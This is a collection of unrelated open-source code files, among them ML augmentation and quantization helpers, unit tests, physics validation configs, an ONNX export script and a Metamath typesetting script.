UnlexerRule(src='customtag', parent=current)
return current
def _custom_lexer_content(self, parent=None):
return UnlexerRule(src='custom content', parent=parent)
|
paperbroker/adapters/quotes/QuoteAdapter.py
|
yutiansut/paperbroker
| 227 |
103774
|
<reponame>yutiansut/paperbroker
import arrow
class QuoteAdapter:
def get_quote(self, asset):
raise NotImplementedError("QuoteAdapter.get_quote: You should subclass this and create an adapter.")
def get_options(self, underlying_asset=None, expiration_date=None):
raise NotImplementedError("QuoteAdapter.get_options: You should subclass this and create an adapter.")
def get_expiration_dates(self, underlying_asset=None):
raise NotImplementedError("QuoteAdapter.get_expiration_dates: You should subclass this and create an adapter.")
|
tests/active_learning/test_ScorerClassification.py
|
CodeGuy-007/lightly
| 1,515 |
103800
|
<reponame>CodeGuy-007/lightly<gh_stars>1000+
import unittest
import numpy as np
from lightly.active_learning.scorers.classification import ScorerClassification, _entropy
class TestScorerClassification(unittest.TestCase):
def test_score_calculation_random(self):
n_samples = 10000
n_classes = 10
np.random.seed(42)
predictions = np.random.rand(n_samples, n_classes)
predictions_normalized = predictions / np.sum(predictions, axis=1)[:, np.newaxis]
model_output = predictions_normalized
scorer = ScorerClassification(model_output)
scores = scorer.calculate_scores()
self.assertEqual(set(scores.keys()), set(ScorerClassification.score_names()))
for score_name, score in scores.items():
self.assertEqual(score.shape, (n_samples,))
self.assertTrue(all(score >= 0))
self.assertTrue(all(score <= 1))
self.assertEqual(type(score), np.ndarray)
def test_score_calculation_specific(self):
model_output = [
[0.7, 0.2, 0.1],
[0.4, 0.5, 0.1]
]
model_output = np.array(model_output)
scorer = ScorerClassification(model_output)
scores = scorer.calculate_scores()
self.assertListEqual(list(scores["uncertainty_least_confidence"]),
[(1 - 0.7) / (1 - 1. / 3.), (1 - 0.5) / (1 - 1. / 3.)])
self.assertListEqual(list(scores["uncertainty_margin"]), [1 - (0.7 - 0.2), 1 - (0.5 - 0.4)])
for val1, val2 in zip(scores["uncertainty_entropy"], _entropy(model_output) / np.log2(3)):
self.assertAlmostEqual(val1, val2, places=8)
def test_score_calculation_binary(self):
model_output = [
[0.7],
[0.4]
]
model_output = np.array(model_output)
scorer = ScorerClassification(model_output)
scores = scorer.calculate_scores()
self.assertListEqual(list(scores["uncertainty_least_confidence"]),
[(1 - 0.7) / (1 - 1. / 2.), (1 - 0.6) / (1 - 1. / 2.)])
self.assertListEqual(list(scores["uncertainty_margin"]), [1 - (0.7 - 0.3), 1 - (0.6 - 0.4)])
model_output = np.concatenate([model_output, 1-model_output], axis=1)
for val1, val2 in zip(scores["uncertainty_entropy"], _entropy(model_output) / np.log2(2)):
self.assertAlmostEqual(val1, val2, places=8)
def test_scorer_classification_empty_model_output(self):
scorer = ScorerClassification(model_output=[])
scores = scorer.calculate_scores()
self.assertEqual(set(scores.keys()), set(ScorerClassification.score_names()))
def test_scorer_classification_variable_model_output_dimension(self):
for num_samples in range(5):
for num_classes in range(5):
with self.subTest(msg=f"model_output.shape = ({num_samples},{num_classes})"):
if num_samples > 0:
preds = [1. / num_samples] * num_classes
else:
preds = []
model_output = [preds] * num_samples
if num_classes == 0 and num_samples > 0:
with self.assertRaises(ValueError):
scorer = ScorerClassification(model_output=model_output)
else:
scorer = ScorerClassification(model_output=model_output)
scores = scorer.calculate_scores()
self.assertEqual(set(scores.keys()), set(ScorerClassification.score_names()))
for score_values in scores.values():
self.assertEqual(len(score_values), len(model_output))
self.assertEqual(type(score_values), np.ndarray)
def test_scorer_classification_variable_model_output_tensor_order(self):
for tensor_order in range(1, 5):
model_output = np.ndarray((3,) * tensor_order)
with self.subTest(msg=f"model_output.shape = {model_output.shape}"):
if tensor_order == 2 or tensor_order == 0:
scorer = ScorerClassification(model_output=model_output)
scores = scorer.calculate_scores()
for score_values in scores.values():
self.assertEqual(type(score_values), np.ndarray)
else:
with self.assertRaises(ValueError):
scorer = ScorerClassification(model_output=model_output)
|
tests/components/kraken/conftest.py
|
MrDelik/core
| 30,023 |
103823
|
"""Provide common pytest fixtures for kraken tests."""
from unittest.mock import patch
import pytest
@pytest.fixture(autouse=True)
def mock_call_rate_limit_sleep():
"""Patch the call rate limit sleep time."""
with patch("homeassistant.components.kraken.CALL_RATE_LIMIT_SLEEP", new=0):
yield
|
Validation/EventGenerator/python/BPhysicsValidation_cfi.py
|
ckamtsikis/cmssw
| 852 |
103836
|
<reponame>ckamtsikis/cmssw<gh_stars>100-1000
import FWCore.ParameterSet.Config as cms
from DQMServices.Core.DQMEDAnalyzer import DQMEDAnalyzer
JPsiMuMuValidation = DQMEDAnalyzer('BPhysicsValidation',
genparticleCollection = cms.InputTag("genParticles",""),
name = cms.string("JPsiMuMuValidation"),
pname = cms.string("J/#Psi"),
pdgid = cms.int32(443),
massmin = cms.double(3.0),
massmax = cms.double(4.0),
daughters = cms.vstring("muminus","muplus"),
muminus = cms.untracked.PSet(pname = cms.string("#mu^{-}"),
pdgid = cms.int32(13),
massmin = cms.double(0.1),
massmax = cms.double(0.2),
),
muplus = cms.untracked.PSet(pname = cms.string("#mu^{+}"),
pdgid = cms.int32(-13),
massmin = cms.double(0.1),
massmax = cms.double(0.2),
)
)
LambdabPiPiMuMuValidation = DQMEDAnalyzer('BPhysicsValidation',
genparticleCollection = cms.InputTag("genParticles",""),
name = cms.string("LambdabPiPiMuMuValidation"),
pname = cms.string("#Lambda_{b}"),
pdgid = cms.int32(5122),
massmin = cms.double(5.5),
massmax = cms.double(6.0),
daughters = cms.vstring("muminus","muplus","piminus","piplus","pminus","pplus","Lambda","Lambdabar"),
muminus = cms.untracked.PSet(pname = cms.string("#mu^{-}"),
pdgid = cms.int32(13),
massmin = cms.double(0.1),
massmax = cms.double(0.2),
),
muplus = cms.untracked.PSet(pname = cms.string("#mu^{+}"),
pdgid = cms.int32(-13),
massmin = cms.double(0.1),
massmax = cms.double(0.2),
),
piminus = cms.untracked.PSet(pname = cms.string("#pi^{-}"),
pdgid = cms.int32(-211),
massmin = cms.double(0.1),
massmax = cms.double(0.2),
),
piplus = cms.untracked.PSet(pname = cms.string("#pi^{+}"),
pdgid = cms.int32(211),
massmin = cms.double(0.1),
massmax = cms.double(0.2),
),
pminus = cms.untracked.PSet(pname = cms.string("p^{-}"),
pdgid = cms.int32(-2212),
massmin = cms.double(0.9),
massmax = cms.double(1.1),
),
pplus = cms.untracked.PSet(pname = cms.string("p^{+}"),
pdgid = cms.int32(2212),
massmin = cms.double(0.9),
massmax = cms.double(1.1),
),
Lambda = cms.untracked.PSet(pname = cms.string("#Lambda"),
pdgid = cms.int32(3122),
massmin = cms.double(1.0),
massmax = cms.double(1.2),
),
Lambdabar = cms.untracked.PSet(pname = cms.string("#bar{#Lambda}"),
pdgid = cms.int32(-3122),
massmin = cms.double(1.0),
massmax = cms.double(1.2),
)
)
PsiSpectrum = DQMEDAnalyzer('BPhysicsSpectrum',
genparticleCollection = cms.InputTag("genParticles",""),
name = cms.string("JPsiSpectrum"),
pdgids = cms.vint32(443,100443,30443,9000443,9010443,9020443),
massmin = cms.double(3.0),
massmax = cms.double(4.5)
)
LambdaSpectrum = DQMEDAnalyzer('BPhysicsSpectrum',
genparticleCollection = cms.InputTag("genParticles",""),
name = cms.string("LambdaSpectrum"),
pdgids = cms.vint32(5122),
massmin = cms.double(5.5),
massmax = cms.double(6.0)
)
|
pymoo/experimental/deriv/gd.py
|
jarreguit/pymoo
| 762 |
103860
|
import numpy as np
from pymoo.experimental.deriv import DerivationBasedAlgorithm
from pymoo.algorithms.base.line import LineSearchProblem
from pymoo.algorithms.soo.univariate.exp import ExponentialSearch
from pymoo.algorithms.soo.univariate.golden import GoldenSectionSearch
from pymoo.core.population import Population
from pymoo.util.vectors import max_alpha
class GradientDescent(DerivationBasedAlgorithm):
def direction(self, dF, **kwargs):
return - dF
def step(self):
problem, sol = self.problem, self.opt[0]
self.evaluator.eval(self.problem, sol, evaluate_values_of=["dF"])
dF = sol.get("dF")[0]
print(sol)
if np.linalg.norm(dF) ** 2 < 1e-8:
self.termination.force_termination = True
return
direction = self.direction(dF)
line = LineSearchProblem(self.problem, sol, direction, strict_bounds=self.strict_bounds)
alpha = self.alpha
if self.strict_bounds:
if problem.has_bounds():
line.xu = np.array([max_alpha(sol.X, direction, *problem.bounds(), mode="all_hit_bounds")])
# remember the step length from the last run
alpha = min(alpha, line.xu[0])
if alpha == 0:
self.termination.force_termination = True
return
# make the solution to be the starting point of the univariate search
x0 = sol.copy(deep=True)
x0.set("__X__", x0.get("X"))
x0.set("X", np.zeros(1))
# determine the brackets to be searched in
exp = ExponentialSearch(delta=alpha).setup(line, evaluator=self.evaluator, termination=("n_iter", 20), x0=x0)
a, b = exp.run().pop[-2:]
# search in the brackets
res = GoldenSectionSearch().setup(line, evaluator=self.evaluator, termination=("n_iter", 20), a=a, b=b).run()
infill = res.opt[0]
# set the alpha value and revert the X to be the multi-variate one
infill.set("X", infill.get("__X__"))
self.alpha = infill.get("alpha")[0]
# keep always a few historical solutions
self.pop = Population.merge(self.pop, infill)[-10:]
|
tools/torch2onnx.py
|
YuxinZou/vedaseg
| 438 |
103865
|
import argparse
import os
import sys
sys.path.insert(0, os.path.join(os.path.dirname(__file__), '../'))
import torch
from volksdep.converters import torch2onnx
from vedaseg.runners import InferenceRunner
from vedaseg.utils import Config
def parse_args():
parser = argparse.ArgumentParser(description='Convert to Onnx model.')
parser.add_argument('config', help='config file path')
parser.add_argument('checkpoint', help='checkpoint file path')
parser.add_argument('out', help='output onnx file name')
parser.add_argument('--dummy_input_shape', default='3,800,1344',
type=str, help='model input shape like 3,800,1344. '
'Shape format is CxHxW')
parser.add_argument('--dynamic_shape', default=False, action='store_true',
help='whether to use dynamic shape')
parser.add_argument('--opset_version', default=9, type=int,
help='onnx opset version')
parser.add_argument('--do_constant_folding', default=False,
action='store_true',
help='whether to apply constant-folding optimization')
parser.add_argument('--verbose', default=False, action='store_true',
help='whether print convert info')
args = parser.parse_args()
return args
def main():
args = parse_args()
cfg = Config.fromfile(args.config)
inference_cfg = cfg['inference']
common_cfg = cfg.get('common')
runner = InferenceRunner(inference_cfg, common_cfg)
assert runner.use_gpu, 'Please use valid gpu to export model.'
runner.load_checkpoint(args.checkpoint)
model = runner.model
shape = map(int, args.dummy_input_shape.split(','))
dummy_input = torch.randn(1, *shape)
if args.dynamic_shape:
print(f'Convert to Onnx with dynamic input shape and '
f'opset version {args.opset_version}')
else:
print(f'Convert to Onnx with constant input shape '
f'{args.dummy_input_shape} and '
f'opset version {args.opset_version}')
torch2onnx(model, dummy_input, args.out, dynamic_shape=args.dynamic_shape,
opset_version=args.opset_version,
do_constant_folding=args.do_constant_folding,
verbose=args.verbose)
print(f'Convert successfully, saved onnx file: {os.path.abspath(args.out)}')
if __name__ == '__main__':
main()
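
# Illustrative invocation (the config, checkpoint and shape below are
# placeholders, not files shipped with the repository):
#
#   python tools/torch2onnx.py configs/voc_unet.py \
#       work_dirs/voc_unet/best.pth model.onnx \
#       --dummy_input_shape 3,513,513 --opset_version 11 --dynamic_shape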
|
macarico/tasks/seq2json.py
|
hal3/macarico
| 121 |
103896
|
<filename>macarico/tasks/seq2json.py
from __future__ import division, generators, print_function
import sys
import random
import macarico
import zss
from macarico.data.vocabulary import EOS
def fold_json(f, x0, json):
if isinstance(json, int):
return f(x0, True, json)
if isinstance(json, list):
for x in json:
x0 = fold_json(f, x0, x)
return x0
if isinstance(json, dict):
for k, v in json.items():
x0 = f(x0, False, k)
x0 = fold_json(f, x0, v)
return x0
assert False
def map_json(f, json):
if isinstance(json, int):
return f(json)
if isinstance(json, list):
return [map_json(f, j) for j in json]
if isinstance(json, dict):
return { f(k): map_json(f, j) for k, j in json.items() }
assert False
def get_max_key(json):
    # fold_json calls f(acc, is_leaf, value); dict keys arrive with is_leaf=False
    return fold_json(lambda x0, is_leaf, v: x0 if is_leaf else max(x0, v), 0, json)
def get_max_ident(json):
    # leaf identifiers arrive with is_leaf=True
    return fold_json(lambda x0, is_leaf, v: max(x0, v) if is_leaf else x0, 0, json)
class Seq2JSONExample(macarico.Example):
def __init__(self, tokens, out_json):
super(Seq2JSONExample, self).__init__(tokens, out_json)
#self.tokens = tokens
#self.truth = out_json
self.n_key = 1 + get_max_key(out_json)
self.n_ident = 1 + get_max_ident(out_json)
class Seq2JSON(macarico.Env):
NODE_ITEM, NODE_LIST, NODE_DICT = 0, 1, 2
def __init__(self, ex, n_key, n_ident, max_depth=40, max_length=5, T=1000):
macarico.Env.__init__(self, n_key + n_ident + 3 + 2, T, ex)
self.n_key = n_key
self.n_ident = n_ident
self.max_depth = max_depth
self.max_length = max_length
self.Y = ex.Y
        self.X = ex.X
        assert ex.X[-1] == EOS
self.actions_node_type = set([0,1,2])
self.actions_stop = set([3,4])
self.actions_string = set([i+5 for i in range(n_ident)])
self.actions_key = set([i+5+n_ident for i in range(n_key)])
def _run_episode(self, policy):
self.policy = policy
self.depth = 0
self.count = 0
#print('self.Y =', self.Y)
self.out = self.generate_tree(self.Y)
#print('out=', self.out)
return self.out
def _rewind(self):
pass
def output(self):
return str(self.out)
def generate_tree(self, truth):
if self.depth > self.max_depth:
return None
self.count += 1
if self.count >= self.horizon(): return None
# predict node type
self.gold_act = self.NODE_DICT if isinstance(truth, dict) else \
self.NODE_LIST if isinstance(truth, list) else \
self.NODE_ITEM if isinstance(truth, int) else \
None
self.actions = self.actions_node_type
#print('generate_tree:', self.depth, self.gold_act)
node_type = self.policy(self)
# generate corresponding type
truth = None if (node_type != self.gold_act) else truth
if node_type == self.NODE_ITEM:
self.count += 1
if self.count >= self.horizon(): return None
self.actions = self.actions_string
self.gold_act = None if truth is None else (truth + 5)
return self.policy(self) - 5
else:
self.depth += 1
res = self.generate_sequence(node_type == self.NODE_DICT, truth)
self.depth -= 1
return res
def generate_sequence(self, is_dict, truth=None):
res = {} if is_dict else []
#print('generate_sequence:', is_dict, truth)
true_keys = None if truth is None or not is_dict else sorted(truth.keys())
for ii in range(self.max_length):
self.count += 1
if self.count >= self.horizon(): break
self.actions = self.actions_stop
self.gold_act = None if truth is None else \
3 if ii == len(truth) else \
4
stop = self.policy(self)
if stop == 3:
break
# if we're generating a dict, we need a key
if is_dict:
self.count += 1
if self.count >= self.horizon(): break
self.actions = self.actions_key
self.gold_act = None if truth is None or ii >= len(true_keys) else \
(true_keys[ii] + 5 + self.n_ident)
key = self.policy(self) - 5 - self.n_ident
# for both lists and dicts we need a value
ii_key = key if is_dict else ii
true_item = None if truth is None else \
truth[ii] if (not is_dict and ii < len(truth)) else \
truth[true_keys[ii]] if (is_dict and ii < len(true_keys) and true_keys[ii] in truth) else \
None
tree = self.generate_tree(true_item)
if is_dict:
res[key] = tree
else:
res.append(tree)
return res
class JSONTreeFollower(macarico.Reference):
def __init__(self):
macarico.Reference.__init__(self)
def __call__(self, state):
assert state.gold_act is not None
assert state.gold_act in state.actions, \
str((state.gold_act, state.actions))
#print('ref', state.gold_act, state.actions)
return state.gold_act
class TreeEditDistance(macarico.Loss):
corpus_level = False
def __init__(self):
super(TreeEditDistance, self).__init__('ted')
def evaluate(self, example):
if example.Y is None: return 999
t_true = self.tree_to_zss(example.Y)
t_pred = self.tree_to_zss(example.Yhat)
return zss.simple_distance(t_true, t_pred)
def tree_to_zss(self, t):
if isinstance(t, int):
return zss.Node(str(t))
elif isinstance(t, list):
node = zss.Node('**LIST**')
for c in t:
node.addkid(self.tree_to_zss(c))
return node
elif isinstance(t, dict):
node = zss.Node('**DICT**')
for k in sorted(t.keys()):
child = zss.Node(k, [self.tree_to_zss(t[k])])
node.addkid(child)
return node
elif t is None:
return zss.Node('**NONE**')
assert False, "don't know what to do with %s" % t
|
tests/test_basic.py
|
mubashshirjamal/code
| 1,582 |
103928
|
import os
import shutil
from vilya.libs.permdir import get_repo_root
from vilya.models.project import CodeDoubanProject
from tests.base import TestCase
class TestBasic(TestCase):
def test_create_git_repo(self):
git_path = os.path.join(get_repo_root(), 'abc.git')
CodeDoubanProject.create_git_repo(git_path)
assert os.path.exists(git_path)
info_file = os.path.join(git_path, 'refs')
assert os.path.exists(info_file)
shutil.rmtree(git_path)
|
imaginaire/utils/diff_aug.py
|
hw07216/imaginaire
| 3,308 |
103958
|
<reponame>hw07216/imaginaire
# Copyright (C) 2021 NVIDIA CORPORATION & AFFILIATES. All rights reserved.
#
# This work is made available under the Nvidia Source Code License-NC.
# To view a copy of this license, check out LICENSE.md
# Differentiable Augmentation for Data-Efficient GAN Training
# <NAME>, <NAME>, <NAME>, <NAME>, and <NAME>
# https://arxiv.org/pdf/2006.10738
# Modified from https://github.com/mit-han-lab/data-efficient-gans
import torch
import torch.nn.functional as F
def apply_diff_aug(data, keys, aug_policy, inplace=False, **kwargs):
r"""Applies differentiable augmentation.
Args:
data (dict): Input data.
keys (list of str): Keys to the data values that we want to apply
differentiable augmentation to.
aug_policy (str): Type of augmentation(s), ``'color'``,
``'translation'``, or ``'cutout'`` separated by ``','``.
"""
if aug_policy == '':
return data
data_aug = data if inplace else {}
for key, value in data.items():
if key in keys:
data_aug[key] = diff_aug(data[key], aug_policy, **kwargs)
else:
data_aug[key] = data[key]
return data_aug
def diff_aug(x, policy='', channels_first=True, **kwargs):
if policy:
if not channels_first:
x = x.permute(0, 3, 1, 2)
for p in policy.split(','):
for f in AUGMENT_FNS[p]:
x = f(x, **kwargs)
if not channels_first:
x = x.permute(0, 2, 3, 1)
x = x.contiguous()
return x
def rand_brightness(x, **kwargs):
x = x + (torch.rand(x.size(0), 1, 1, 1, dtype=x.dtype,
device=x.device) - 0.5)
return x
def rand_saturation(x, **kwargs):
x_mean = x.mean(dim=1, keepdim=True)
x = (x - x_mean) * (torch.rand(x.size(0), 1, 1, 1, dtype=x.dtype,
device=x.device) * 2) + x_mean
return x
def rand_contrast(x, **kwargs):
x_mean = x.mean(dim=[1, 2, 3], keepdim=True)
x = (x - x_mean) * (torch.rand(x.size(0), 1, 1, 1, dtype=x.dtype,
device=x.device) + 0.5) + x_mean
return x
def rand_translation(x, ratio=0.125, **kwargs):
shift_x, shift_y = int(x.size(2) * ratio + 0.5), int(
x.size(3) * ratio + 0.5)
translation_x = torch.randint(-shift_x, shift_x + 1, size=[x.size(0), 1, 1],
device=x.device)
translation_y = torch.randint(-shift_y, shift_y + 1, size=[x.size(0), 1, 1],
device=x.device)
# noinspection PyTypeChecker
grid_batch, grid_x, grid_y = torch.meshgrid(
torch.arange(x.size(0), dtype=torch.long, device=x.device),
torch.arange(x.size(2), dtype=torch.long, device=x.device),
torch.arange(x.size(3), dtype=torch.long, device=x.device),
)
grid_x = torch.clamp(grid_x + translation_x + 1, 0, x.size(2) + 1)
grid_y = torch.clamp(grid_y + translation_y + 1, 0, x.size(3) + 1)
x_pad = F.pad(x, [1, 1, 1, 1, 0, 0, 0, 0])
x = x_pad.permute(0, 2, 3, 1).contiguous()[
grid_batch, grid_x, grid_y].permute(0, 3, 1, 2)
return x
def rand_cutout(x, ratio=0.5, **kwargs):
cutout_size = int(x.size(2) * ratio + 0.5), int(x.size(3) * ratio + 0.5)
offset_x = torch.randint(0, x.size(2) + (1 - cutout_size[0] % 2),
size=[x.size(0), 1, 1], device=x.device)
offset_y = torch.randint(0, x.size(3) + (1 - cutout_size[1] % 2),
size=[x.size(0), 1, 1], device=x.device)
# noinspection PyTypeChecker
grid_batch, grid_x, grid_y = torch.meshgrid(
torch.arange(x.size(0), dtype=torch.long, device=x.device),
torch.arange(cutout_size[0], dtype=torch.long, device=x.device),
torch.arange(cutout_size[1], dtype=torch.long, device=x.device),
)
grid_x = torch.clamp(grid_x + offset_x - cutout_size[0] // 2, min=0,
max=x.size(2) - 1)
grid_y = torch.clamp(grid_y + offset_y - cutout_size[1] // 2, min=0,
max=x.size(3) - 1)
mask = torch.ones(x.size(0), x.size(2), x.size(3),
dtype=x.dtype, device=x.device)
mask[grid_batch, grid_x, grid_y] = 0
x = x * mask.unsqueeze(1)
return x
def rand_translation_scale(x, trans_r=0.125, scale_r=0.125,
mode='bilinear', padding_mode='reflection',
**kwargs):
assert x.dim() == 4, "Input must be a 4D tensor."
batch_size = x.size(0)
# Identity transformation.
theta = torch.eye(2, 3, device=x.device).unsqueeze(0).repeat(
batch_size, 1, 1)
# Translation, uniformly sampled from (-trans_r, trans_r).
translate = \
2 * trans_r * torch.rand(batch_size, 2, device=x.device) - trans_r
theta[:, :, 2] += translate
# Scaling, uniformly sampled from (1-scale_r, 1+scale_r).
scale = \
2 * scale_r * torch.rand(batch_size, 2, device=x.device) - scale_r
theta[:, :, :2] += torch.diag_embed(scale)
grid = F.affine_grid(theta, x.size())
x = F.grid_sample(
x.float(), grid.float(), mode=mode, padding_mode=padding_mode)
return x
AUGMENT_FNS = {
'color': [rand_brightness, rand_saturation, rand_contrast],
'translation': [rand_translation],
'translation_scale': [rand_translation_scale],
'cutout': [rand_cutout],
}
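

# --- Illustrative usage sketch (not part of the original module) ---
# How the helpers above are typically called on a batch of generated images
# during GAN training. The tensors and the policy string are placeholders; the
# policy names must match keys of AUGMENT_FNS.
if __name__ == "__main__":
    fake_images = torch.rand(4, 3, 64, 64)  # NCHW, roughly [0, 1]
    augmented = diff_aug(fake_images, policy='color,translation,cutout')
    print(augmented.shape)  # torch.Size([4, 3, 64, 64])

    # apply_diff_aug works on a data dict and only augments the listed keys.
    data = {'images': fake_images, 'labels': torch.zeros(4, dtype=torch.long)}
    data_aug = apply_diff_aug(data, keys=['images'], aug_policy='color,cutout')
    print(data_aug['labels'] is data['labels'])  # True: other entries pass through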
|
scripts/typeset.py
|
TjWhale/set.mm
| 153 |
104033
|
<gh_stars>100-1000
#!/bin/python
# Process a file's `...` instructions using an mmfile's typographical commands
# Reads from stdin and sends to stdout. By default the mmfile is "set.mm".
# Use the "--help" option to see all the options.
# Sample usage:
# python scripts/typeset.py --html < demo.html.raw > demo.html
# Copyright 2018, <NAME>
# SPDX-License-Identifier: MIT
# Use Python 3 print() syntax, even if we run this in Python 2.
from __future__ import print_function
import sys
import re
import fileinput
import argparse
# Force hashes to be sorted by insertion order, so --list is easy.
# All hashes do this on Python 3.7+, but we want it to happen
# in Python 2.7+ as well. Using OrderedDict makes it work in all cases.
from collections import OrderedDict
# TODO: Currently each `...` must not cross lines.
# TODO: Currently this doesn't handle 'no space if followed by punctuation'.
# Apply typographical definitions in MMFILE which look like this:
# htmldef "(" as "<IMG SRC='lp.gif' WIDTH=5 HEIGHT=19 ALT=' (' TITLE='('>";
# We read in the typographical instructions using a simple
# recursive descent parser, then translate what is in `...`.
# Default options
required_start = 'althtmldef '
mmfile = 'set.mm'
# We read typo definitions from typo_file.
typo_file = None
# "remains" is what's left to read on this line from typo_file
remains = ''
# This is the set of definitions we read from typo_file.
# Each key can be in `...`; the corresponding values are their translations.
typo_definition = OrderedDict()
def read_fill_line():
'''
Clear out leading space, and if current line is empty, read next line
from typo_file into "remains". Returns '' when at end of file.
'''
global remains
remains = remains.lstrip()
if remains == '':
remains = typo_file.readline()
if remains == '': return # File done
read_fill_line() # Recurse until we find something
def read_comment():
'''Skip through a /* ... */ comment'''
global remains
while '*/' not in remains:
remains = ''
read_fill_line()
comment, junk, remains = remains.partition('*/')
def read_required(value):
'''Read a required symbol; error out if it is not there'''
global remains
read_fill_line()
if not remains.startswith(value):
        raise ValueError('expected {!r} in typographic definition, found: {!r}'.format(value, remains))
remains = remains[len(value):]
read_fill_line()
def read_string():
    '''Read a typographical string, which may continue using +'''
global remains
read_fill_line()
if remains == '':
        return '' # EOF: nothing left to read
elif remains[0] == '"' or remains[0] == "'":
result, junk, remains = remains[1:].partition(remains[0])
read_fill_line()
# Recurse if we have +
if remains and remains[0] == '+':
read_required('+')
return result + read_string()
return result
elif remains.startswith('/*'):
# This presumes /*..*/ comments stay on one line
comment, junk, remains = remains.partition('*/')
return read_string()
else:
        raise ValueError('unexpected text in typographic definition: {!r}'.format(remains)) # should not happen
def read_definition():
'''Read in a definition from typo_file given remains'''
symbol = read_string()
read_required('as')
result = read_string()
read_required(';')
typo_definition[symbol] = result # Set definition in typo_definition.
def read_definitions():
'''Read all definitions from typo_file'''
global typo_file
global remains
typo_file = open(mmfile)
while True:
read_fill_line()
if remains == '': break # We have reached end of file.
stripped = remains.lstrip()
if stripped.startswith('/*'): # Skip comments
if '*/' in stripped:
comment, junk, remains = remains.partition('*/')
else:
read_comment()
if stripped.startswith(required_start): # Found our definition?
remains = stripped[len(required_start):]
read_definition()
else:
remains = '' # clear out line so we'll read next one
# This searches for backquoted text in a line.
backquoted = re.compile(r'(?:^|(?<= ))` +(([^`]|``)*) +`(?=$| )')
def replace_typographically(m):
'''
Given a match item, return string;
each word is replaced using typo_definition.
    If something isn't in the list, return the original text surrounded
by backquotes (presumably we weren't supposed to get this).
'''
inner = m.group(1) # The text to change
translated_list = list(map(lambda i: typo_definition.get(i, None),
inner.split()))
if None in translated_list:
return '` ' + inner + ' `' # Return untransformed version
else:
translation = ' '.join(translated_list)
return translation.strip()
# Set up option handling
my_parser = argparse.ArgumentParser()
my_parser.add_argument('--html', help='Use older HTML format',
action="store_true")
my_parser.add_argument('--althtml', help='Use ALTHTML format (default)',
action="store_true")
my_parser.add_argument('--latex', help='Use LaTex format',
action="store_true")
my_parser.add_argument('--mmfile', help='Use this mmfile (default set.mm)')
my_parser.add_argument('--list',
help='List symbols and their results (in tab separated value format). ' +
'This is sorted in $t order (this may differ from $c declaration order)',
action="store_true")
args = my_parser.parse_args()
# Handle command-line options
if args.html:
required_start = 'htmldef '
if args.althtml:
required_start = 'althtmldef '
if args.latex:
required_start = 'latexdef '
if args.mmfile:
mmfile = args.mmfile
# Read in the typographic definitions.
read_definitions()
# print(typo_definition)
if args.list:
print('symbol\ttranslation')
for sym, translation in typo_definition.items():
print('{}\t{}'.format(sym, translation))
sys.exit(0)
# Now translate stdin using those definitions.
for line in sys.stdin:
s = backquoted.search(line)
new_line = re.sub(backquoted, replace_typographically, line)
print(new_line, end='')
|
nncf/torch/tensor_statistics/reduction.py
|
MaximProshin/nncf
| 136 |
104037
|
"""
Copyright (c) 2022 Intel Corporation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from typing import List, Tuple
import torch
import numpy as np
def max_reduce_like(input_: torch.Tensor, ref_tensor_shape: List[int]) -> torch.Tensor:
numel = np.prod(ref_tensor_shape)
if numel == 1:
retval = input_.max()
for _ in ref_tensor_shape:
retval.unsqueeze_(-1)
return retval
tmp_max = input_
for dim_idx, dim in enumerate(ref_tensor_shape):
if dim == 1:
tmp_max, _ = torch.max(tmp_max, dim_idx, keepdim=True)
return tmp_max
def min_reduce_like(input_: torch.Tensor, ref_tensor_shape: List[int]):
numel = np.prod(ref_tensor_shape)
if numel == 1:
retval = input_.min()
for _ in ref_tensor_shape:
retval.unsqueeze_(-1)
return retval
tmp_min = input_
for dim_idx, dim in enumerate(ref_tensor_shape):
if dim == 1:
tmp_min, _ = torch.min(tmp_min, dim_idx, keepdim=True)
return tmp_min
def get_channel_count_and_dim_idx(scale_shape: List[int]) -> Tuple[int, int]:
channel_dim_idx = 0
channel_count = 1
for dim_idx, dim in enumerate(scale_shape):
if dim != 1:
channel_dim_idx = dim_idx
channel_count = dim
return channel_count, channel_dim_idx
def expand_like(input_: torch.Tensor, scale_shape: List[int]) -> torch.Tensor:
retval = input_
count, idx = get_channel_count_and_dim_idx(scale_shape)
assert input_.numel() == count
assert len(input_.size()) == 1
for _ in range(0, idx):
retval = retval.unsqueeze(0)
for _ in range(idx + 1, len(scale_shape)):
retval = retval.unsqueeze(-1)
return retval
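

# --- Illustrative usage sketch (not part of the original module) ---
# The helpers above reduce/broadcast along every dimension whose size is 1 in a
# per-channel scale shape. The shapes below are placeholders.
if __name__ == "__main__":
    acts = torch.rand(8, 16, 4, 4)  # (N, C, H, W) activations
    scale_shape = [1, 16, 1, 1]     # one scale value per channel

    per_channel_max = max_reduce_like(acts, scale_shape)
    per_channel_min = min_reduce_like(acts, scale_shape)
    print(per_channel_max.shape, per_channel_min.shape)  # both torch.Size([1, 16, 1, 1])

    # expand_like turns a flat per-channel vector back into the scale shape.
    flat = torch.rand(16)
    print(expand_like(flat, scale_shape).shape)  # torch.Size([1, 16, 1, 1])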
|
tests/features/steps/all.py
|
jaimegildesagredo/finch
| 118 |
104038
|
<filename>tests/features/steps/all.py
# -*- coding: utf-8 -*-
from behave import when, then
from tornado import ioloop
@when(u'I get all the users')
def impl(context):
def on_users(users, error):
ioloop.IOLoop.instance().stop()
context.users = users
context.error = error
context.collection.all(on_users)
ioloop.IOLoop.instance().start()
assert not context.error
@then(u'I should have a list of users')
def impl(context):
assert isinstance(context.users, list)
assert isinstance(context.users[0], context.collection.model)
|
codigo/Live148/app/database.py
|
cassiasamp/live-de-python
| 572 |
104039
|
<filename>codigo/Live148/app/database.py
import databases
import sqlalchemy
from starlette.config import Config
config = Config(".env")
TESTING = config("TESTING", cast=bool, default=False)
DATABASE_URL = config("DATABASE_URL", cast=databases.DatabaseURL)
TEST_DATABASE_URL = DATABASE_URL.replace(
database="test_" + DATABASE_URL.database
)
if TESTING:
database = databases.Database(TEST_DATABASE_URL, force_rollback=True)
else:
database = databases.Database(DATABASE_URL)
metadata = sqlalchemy.MetaData()
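
# Illustrative .env for this module (values are placeholders only):
#
#   TESTING=False
#   DATABASE_URL=postgresql://user:secret@localhost:5432/app_db
#
# With TESTING=True the same URL is used but with the database renamed to
# "test_app_db", and the connection is opened with force_rollback=True so that
# test writes never persist.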
|
